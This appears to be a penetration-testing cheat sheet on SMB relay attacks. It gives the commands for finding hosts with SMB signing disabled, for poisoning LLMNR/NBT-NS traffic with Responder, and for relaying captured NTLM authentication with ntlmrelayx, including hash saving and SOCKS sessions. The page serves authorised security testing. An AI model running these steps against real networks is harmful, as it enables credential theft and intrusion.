SMB Relaying
After observing LLMNR and/or NBT-NS traffic with Responder and forcing the client to authenticate to your machine, it is possible for the attacker to relay the Net-NTLMv2 hash obtained to all systems within scope that have SMB Signing Disabled.
Identifying Systems with SMB Signing Disabled
RunFinger.py
Finger is included with Responder.py in the /tools
directory. Simply run the tool against either a subnet or file and parse the results using cut
python3 RunFinger.py -i $subnet
CrackMapExec
A list can also easily be created with CrackMapExec:
crackmapexec smb $subnet --gen-relay-list
Nmap
Nmap can also create a list of hosts that have SMB Signing Disabled:
nmap --script=smb-security-mode -p445 $ip
SMB Relaying 101
After confirming LLMNR/NBT-NS traffic and identifying systems with SMB Signing Disabled, we are ready to perform the attack. First, we need modify the Responder.conf
file and disable both SMB and HTTP:
# responder.conf
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
We can then run Responder:
responder -I eth0 -dwP
We can then run ntlmrelayx.py
from Impacket, supplying our file of hosts previously identified to have SMB Signing Disabled.
# Example generic relaying
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support
# Save hashes from relaying locally
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support -of
Relaying with SOCKS
We can also enable SOCKS support while relaying for interactive sessions. Using this flag will also provide you with a session on the host if the user is not a local administrator:
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support --socks
References
Last updated